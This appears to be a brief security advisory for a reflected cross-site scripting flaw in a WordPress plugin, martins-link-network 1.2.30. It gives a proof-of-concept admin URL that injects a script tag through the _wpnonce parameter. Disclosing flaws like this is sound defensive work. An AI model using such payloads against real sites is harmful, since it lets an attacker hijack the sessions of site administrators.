Description The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Make a logged in amin open https://example.com/wp-admin/plugins.php?action=deactivate&plugin;=martins-link-network%2FmartinsLinkNetwork.php&plugin;_status=all&paged;=1&s;&_wpnonce='><script>alert(/XSS/)</script><a href='
CPE | Name | Operator | Version |
---|---|---|---|
eq | 1.2.30 |